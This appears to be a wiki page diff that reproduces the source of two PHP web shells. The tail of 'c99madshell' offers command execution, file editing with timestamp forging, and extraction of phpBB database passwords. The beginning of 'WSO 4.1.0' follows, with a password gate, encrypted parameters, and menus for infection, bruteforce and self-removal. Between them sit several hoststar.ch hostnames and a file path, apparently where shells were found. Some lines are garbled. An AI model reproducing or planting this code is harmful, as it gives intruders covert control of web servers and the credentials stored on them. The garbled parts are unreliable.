+ | if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} | ||
+ | $a1 .= "<br>"; | ||
+ | $a2 .= "<br>"; | ||
+ | } | ||
+ | } | ||
+ | //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} | ||
+ | echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; | ||
+ | } | ||
+ | $encoded = ""; | ||
+ | if ($base64 == 1) | ||
+ | { | ||
+ | echo "<b>Base64 Encode</b><br>"; | ||
+ | $encoded = base64_encode(file_get_contents($d.$f)); | ||
+ | } | ||
+ | elseif($base64 == 2) | ||
+ | { | ||
+ | echo "<b>Base64 Encode + Chunk</b><br>"; | ||
+ | $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); | ||
+ | } | ||
+ | elseif($base64 == 3) | ||
+ | { | ||
+ | echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; | ||
+ | $encoded = base64_encode(file_get_contents($d.$f)); | ||
+ | $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); | ||
+ | } | ||
+ | elseif($base64 == 4) | ||
+ | { | ||
+ | $text = file_get_contents($d.$f); | ||
+ | $encoded = base64_decode($text); | ||
+ | echo "<b>Base64 Decode"; | ||
+ | if (base64_encode($encoded) != $text) {echo " (failed)";} | ||
+ | echo "</b><br>"; | ||
+ | } | ||
+ | if (!empty($encoded)) | ||
+ | { | ||
+ | echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; | ||
+ | } | ||
+ | echo "<b>HEXDUMP:</b><nobr> [<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.fullhexdump.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Full</a>] [<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Preview</a>]<br><b>Base64: </b> | ||
+ | |||
+ | <nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Encode</a>] </nobr> | ||
+ | <nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='2';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">+chunk</a>] </nobr> | ||
+ | <nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='3';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">+chunk+quotes</a>] </nobr> | ||
+ | <nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='4';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Decode</a>] </nobr> | ||
+ | <P>"; | ||
+ | } | ||
+ | elseif ($ft == "html") | ||
+ | { | ||
+ | if ($white) {@ob_clean();} | ||
+ | echo $r; | ||
+ | if ($white) {c99shexit();} | ||
+ | } | ||
+ | elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} | ||
+ | elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} | ||
+ | elseif ($ft == "phpsess") | ||
+ | { | ||
+ | echo "<pre>"; | ||
+ | $v = explode("|",$r); | ||
+ | echo $v[0]."<br>"; | ||
+ | var_dump(unserialize($v[1])); | ||
+ | echo "</pre>"; | ||
+ | } | ||
+ | elseif ($ft == "exe") | ||
+ | { | ||
+ | $ext = explode(".",$f); | ||
+ | $c = count($ext)-1; | ||
+ | $ext = $ext[$c]; | ||
+ | $ext = strtolower($ext); | ||
+ | $rft = ""; | ||
+ | foreach($exeftypes as $k=>$v) | ||
+ | { | ||
+ | if (in_array($ext,$v)) {$rft = $k; break;} | ||
+ | } | ||
+ | $cmd = str_replace("%f%",$f,$rft); | ||
+ | echo "<b>Execute file:</b><form method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; | ||
+ | } | ||
+ | elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} | ||
+ | elseif ($ft == "code") | ||
+ | { | ||
+ | if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) | ||
+ | { | ||
+ | $arr = explode("\n",$r); | ||
+ | if (count($arr == 18)) | ||
+ | { | ||
+ | include($d.$f); | ||
+ | echo "<b>phpBB configuration is detected in this file!<br>"; | ||
+ | if ($dbms == "mysql4") {$dbms = "mysql";} | ||
+ | if ($dbms == "mysql") {echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($dbuser)."';document.sql.sql_passwd.value='".htmlspecialchars($dbpasswd)."';document.sql.sql_server.value='".htmlspecialchars($dbhost)."';document.sql.sql_port.value='3306';document.sql.sql_db.value='".htmlspecialchars($dbname)."';document.sql.submit();\"><b><u>Connect to DB</u></b></a><br><br>";} | ||
+ | else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99madshell. Please, report us for fix.";} | ||
+ | echo "Parameters for manual connect:<br>"; | ||
+ | $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); | ||
+ | foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} | ||
+ | echo "</b><hr size=\"1\" noshade>"; | ||
+ | } | ||
+ | } | ||
+ | echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; | ||
+ | if (!empty($white)) {@ob_clean();} | ||
+ | highlight_file($d.$f); | ||
+ | if (!empty($white)) {c99shexit();} | ||
+ | echo "</div>"; | ||
+ | } | ||
+ | elseif ($ft == "download") | ||
+ | { | ||
+ | @ob_clean(); | ||
+ | header("Content-type: application/octet-stream"); | ||
+ | header("Content-length: ".filesize($d.$f)); | ||
+ | header("Content-disposition: attachment; filename=\"".$f."\";"); | ||
+ | echo $r; | ||
+ | exit; | ||
+ | } | ||
+ | elseif ($ft == "notepad") | ||
+ | { | ||
+ | @ob_clean(); | ||
+ | header("Content-type: text/plain"); | ||
+ | header("Content-disposition: attachment; filename=\"".$f.".txt\";"); | ||
+ | echo($r); | ||
+ | exit; | ||
+ | } | ||
+ | elseif ($ft == "edit") | ||
+ | { | ||
+ | if (!empty($submit)) | ||
+ | { | ||
+ | if ($filestealth) {$stat = stat($d.$f);} | ||
+ | $fp = fopen($d.$f,"w"); | ||
+ | if (!$fp) {echo "<b>Can't write to file!</b>";} | ||
+ | else | ||
+ | { | ||
+ | echo "<b>Saved!</b>"; | ||
+ | fwrite($fp,$edit_text); | ||
+ | fclose($fp); | ||
+ | if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} | ||
+ | $r = $edit_text; | ||
+ | } | ||
+ | } | ||
+ | $rows = count(explode("\r\n",$r)); | ||
+ | if ($rows < 10) {$rows = 10;} | ||
+ | if ($rows > 30) {$rows = 30;} | ||
+ | echo "<form method=\"POST\"><input name='act' type='hidden' value='f'><input name='f' type='hidden' value='".urlencode($f)."'><input name='ft' type='hidden' value='edit'><input name='d' type='hidden' value='".urlencode($d)."'><input type=submit name=submit value=\"Save\"> <input type=\"reset\" value=\"Reset\"> <input type=\"button\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".addslashes(substr($d,0,-1))."';document.todo.submit();\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; | ||
+ | } | ||
+ | elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} | ||
+ | else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} | ||
+ | } | ||
+ | } | ||
+ | if ($act == "about") {echo "<center><b>Webbased shell for administration your resources<br>Credits:<br>Start coding by CCTeaM.<br><font color=green>Edited and Finished by <b>MADNET</b><br>ICQ 751777 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=751777\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=751777&img=5\" border=0 align=absmiddle></font></a>.</b>";} | ||
+ | ?> | ||
+ | |||
+ | </td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> | ||
+ | <tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="#" onclick="document.todo.act.value='cmd';document.todo.d.value='<?php echo urlencode($d); ?>';document.todo.submit();"><b>Command execute</b></a> ::</b></p></td></tr> | ||
+ | <tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td></tr></TABLE> | ||
+ | <br> | ||
+ | <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> | ||
+ | <tr> | ||
+ | <td width="50%" height="1" valign="top"><center><b>:: <a href="#" onclick="document.todo.act.value='search';document.todo.submit();"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> - regexp <input type=submit name=submit value="Search"></form></center></p></td> | ||
+ | |||
+ | <td width="50%" height="1" valign="top"><center><b>:: <a href="#" onclick="document.todo.act.value='upload';document.todo.submit();"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1"> <input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> | ||
+ | </tr> | ||
+ | </table> | ||
+ | <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form method="POST"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit"> <input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> | ||
+ | <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form method="POST"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form method="POST""><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go"></form></center></td></tr></table> | ||
+ | <br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99madshell v. <?php echo $shver; ?><a href="#" OnClick="document.todo.act.value='about';document.todo.submit();"><u> EDITED BY </b><b>MADNET</u></b> </a>| <a href="http://securityprobe.net"><font color="#FF0000">http://securityprobe.net</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table> | ||
+ | |||
+ | </body></html><?php chdir($lastdir); c99shexit(); ?> | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ---- | ||
+ | |||
+ | login-93.hoststar.ch | ||
+ | |||
+ | /home/www/confixx/html/reseller/index3.php | ||
+ | |||
+ | login-95.hoststar.ch | ||
+ | |||
+ | /home/www/confixx/html/reseller/index3.php | ||
+ | |||
+ | login-96.hoststar.ch | ||
+ | |||
+ | /home/www/confixx/html/reseller/index3.php | ||
+ | |||
+ | <syntaxhighlight lang="bash" style="font-size:9pt;"> | ||
+ | <?php | ||
+ | //-----------------Password--------------------- | ||
+ | $â297a57a5a743894a0e4a801fc3"; //admin | ||
+ | $â = "#fff"; | ||
+ | $â = true; | ||
+ | $â = 'UTF-8'; | ||
+ | $â = 'FilesMan'; | ||
+ | $â = md5($_SERVER['HTTP_USER_AGENT']); | ||
+ | if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) { | ||
+ | prototype(md5($_SERVER['HTTP_HOST'])."key", $â); | ||
+ | } | ||
+ | if(empty($_POST['charset'])) | ||
+ | $_POST['charset'] = $â; | ||
+ | if (!isset($_POST['ne'])) { | ||
+ | if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); | ||
+ | if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); | ||
+ | if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); | ||
+ | if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); | ||
+ | if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); | ||
+ | } | ||
+ | function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);} | ||
+ | @ini_set('error_log',NULL); | ||
+ | @ini_set('log_errors',0); | ||
+ | @ini_set('max_execution_time',0); | ||
+ | @set_time_limit(0); | ||
+ | @set_magic_quotes_runtime(0); | ||
+ | @define('VERSION', '4.1.0'); | ||
+ | if(get_magic_quotes_gpc()) { | ||
+ | function stripslashes_array($array) { | ||
+ | return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); | ||
+ | } | ||
+ | $_POST = stripslashes_array($_POST); | ||
+ | $_COOKIE = stripslashes_array($_COOKIE); | ||
+ | } | ||
+ | if(!empty($â | ||
+ | if(isset($_POST['pass']) && (md5($_POST['pass']) == $â | ||
+ | rototype(md5($_SERVER['HTTP_HOST']), $â | ||
+ | f (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $â | ||
+ | ardLogin(); | ||
+ | } | ||
+ | if(strtolower(substr(PHP_OS,0,3)) == "win") | ||
+ | $os = 'win'; | ||
+ | else | ||
+ | $os = 'nix'; | ||
+ | $safe_mode = @ini_get('safe_mode'); | ||
+ | if(!$safe_mode) | ||
+ | error_reporting(0); | ||
+ | $disable_functions = @ini_get('disable_functions'); | ||
+ | $home_cwd = @getcwd(); | ||
+ | if(isset($_POST['c'])) | ||
+ | @chdir($_POST['c']); | ||
+ | $cwd = @getcwd(); | ||
+ | if($os == 'win') { | ||
+ | $home_cwd = str_replace("\\", "/", $home_cwd); | ||
+ | $cwd = str_replace("\\", "/", $cwd); | ||
+ | } | ||
+ | if($cwd[strlen($cwd)-1] != '/') | ||
+ | $cwd .= '/'; | ||
+ | function hardHeader() { | ||
+ | if(empty($_POST['charset'])) | ||
+ | $_POST['charset'] = $GLOBALS['â']; | ||
+ | global $â; | ||
+ | echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."</title> | ||
+ | <style> | ||
+ | body {background-color:#060a10;color:#e1e1e1;} | ||
+ | body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;} | ||
+ | table.info {color:#C3C3C3;background-color:#060a10;} | ||
+ | span,h1,a {color:$â !important;} | ||
+ | span {font-weight:bolder;} | ||
+ | h1 {border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;} | ||
+ | div.content {padding:5px;margin-left:5px;background-color:#060a10;} | ||
+ | a {text-decoration:none;} | ||
+ | a:hover {text-decoration:underline;} | ||
+ | .ml1 {border:1px solid #1e252e;padding:5px;margin:0;overflow:auto;} | ||
+ | .bigarea {width:100%;height:250px; } | ||
+ | input, textarea, select {margin:0;color:#fff;background-color:#1e252e;border:1px solid #060a10; font:9pt Courier New;outline:none;} | ||
+ | form {margin:0px;} | ||
+ | #toolsTbl {text-align:center;} | ||
+ | .toolsInp {width:300px} | ||
+ | .main th {text-align:left;background-color:#060a10;} | ||
+ | .main tr:hover{background-color:#354252;} | ||
+ | .main td, th{vertical-align:middle;} | ||
+ | .l1 {background-color:#1e252e;} | ||
+ | pre {font:9pt Courier New;} | ||
+ | </style> | ||
+ | <script> | ||
+ | var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; | ||
+ | var a_ = '" . htmlspecialchars(@$_POST['a']) ."' | ||
+ | var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."'; | ||
+ | var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."'; | ||
+ | var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."'; | ||
+ | var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."'; | ||
+ | var d = document; | ||
+ | |||
+ | function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);} | ||
+ | function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;} | ||
+ | function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;} | ||
+ | function set(a,c,p1,p2,p3,charset) { | ||
+ | if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; | ||
+ | if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; | ||
+ | if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; | ||
+ | if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; | ||
+ | if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; | ||
+ | d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); | ||
+ | d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); | ||
+ | d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); | ||
+ | d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); | ||
+ | d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); | ||
+ | if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; | ||
+ | } | ||
+ | function g(a,c,p1,p2,p3,charset) { | ||
+ | set(a,c,p1,p2,p3,charset); | ||
+ | d.mf.submit(); | ||
+ | } | ||
+ | function a(a,c,p1,p2,p3,charset) { | ||
+ | set(a,c,p1,p2,p3,charset); | ||
+ | var params = 'ajax=true'; | ||
+ | for(i=0;i<d.mf.elements.length;i++) | ||
+ | params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); | ||
+ | sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params); | ||
+ | } | ||
+ | function sr(url, params) { | ||
+ | if (window.XMLHttpRequest) | ||
+ | req = new XMLHttpRequest(); | ||
+ | else if (window.ActiveXObject) | ||
+ | req = new ActiveXObject('Microsoft.XMLHTTP'); | ||
+ | if (req) { | ||
+ | req.onreadystatechange = processReqChange; | ||
+ | req.open('POST', url, true); | ||
+ | req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); | ||
+ | req.send(params); | ||
+ | } | ||
+ | } | ||
+ | function processReqChange() { | ||
+ | if( (req.readyState == 4) ) | ||
+ | if(req.status == 200) { | ||
+ | var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); | ||
+ | var arr=reg.exec(req.responseText); | ||
+ | eval(arr[2].substr(0, arr[1])); | ||
+ | } else alert('Request error!'); | ||
+ | } | ||
+ | </script> | ||
+ | <head><body><div style='position:absolute;width:100%;background-color:#1e252e;top:0;left:0;'> | ||
+ | <form method=post name=mf style='display:none;'> | ||
+ | <input type=hidden name=a> | ||
+ | <input type=hidden name=c> | ||
+ | <input type=hidden name=p1> | ||
+ | <input type=hidden name=p2> | ||
+ | <input type=hidden name=p3> | ||
+ | <input type=hidden name=charset> | ||
+ | </form>"; | ||
+ | $freeSpace = @diskfreespace($GLOBALS['cwd']); | ||
+ | $totalSpace = @disk_total_space($GLOBALS['cwd']); | ||
+ | $totalSpace = $totalSpace?$totalSpace:1; | ||
+ | $release = @php_uname('r'); | ||
+ | $kernel = @php_uname('s'); | ||
+ | $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description='; | ||
+ | if(strpos('Linux', $kernel) !== false) | ||
+ | $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); | ||
+ | else | ||
+ | $explink .= urlencode($kernel . ' ' . substr($release,0,3)); | ||
+ | if(!function_exists('posix_getegid')) { | ||
+ | $user = @get_current_user(); | ||
+ | $uid = @getmyuid(); | ||
+ | $gid = @getmygid(); | ||
+ | $group = "?"; | ||
+ | } else { | ||
+ | $uid = @posix_getpwuid(@posix_geteuid()); | ||
+ | $gid = @posix_getgrgid(@posix_getegid()); | ||
+ | $user = $uid['name']; | ||
+ | $uid = $uid['uid']; | ||
+ | $group = $gid['name']; | ||
+ | $gid = $gid['gid']; | ||
+ | } | ||
+ | $cwd_links = ''; | ||
+ | $path = explode("/", $GLOBALS['cwd']); | ||
+ | $n=count($path); | ||
+ | for($i=0; $i<$n-1; $i++) { | ||
+ | $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; | ||
+ | for($j=0; $j<=$i; $j++) | ||
+ | $cwd_links .= $path[$j].'/'; | ||
+ | $cwd_links .= "\")'>".$path[$i]."/</a>"; | ||
+ | } | ||
+ | $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); | ||
+ | $opt_charsets = ''; | ||
+ | foreach($charsets as $â) | ||
+ | $opt_charsets .= '<option value="'.$â.'" '.($_POST['charset']==$â?'selected':'').'>'.$â.'</option>'; | ||
+ | $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); | ||
+ | if(!empty($GLOBALS['â)) | ||
+ | $m['Logout'] = 'Logout'; | ||
+ | $m['Self remove'] = 'SelfRemove'; | ||
+ | $menu = ''; | ||
+ | foreach($m as $k => $v) | ||
+ | $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; | ||
+ | $drives = ""; | ||
+ | if ($GLOBALS['os'] == 'win') { | ||
+ | foreach(range('c','z') as $drive) | ||
+ | if (is_dir($drive.':\\')) | ||
+ | $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; | ||
+ | } | ||
+ | echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'. | ||
+ | '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://noreferer.de/?http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="' . $explink . '" target=_blank>[ Exploit-DB ]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . viewSize($totalSpace) . ' <span>Free:</span> ' . viewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. viewPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'. | ||
+ | '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . gethostbyname($_SERVER["HTTP_HOST"]) . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'. | ||
+ | '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div>'; | ||
+ | } | ||
+ | function hardFooter() { | ||
+ | $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>"; | ||
+ | echo " | ||
+ | </div> | ||
+ | <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%> | ||
+ | <tr> | ||
+ | <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td> | ||
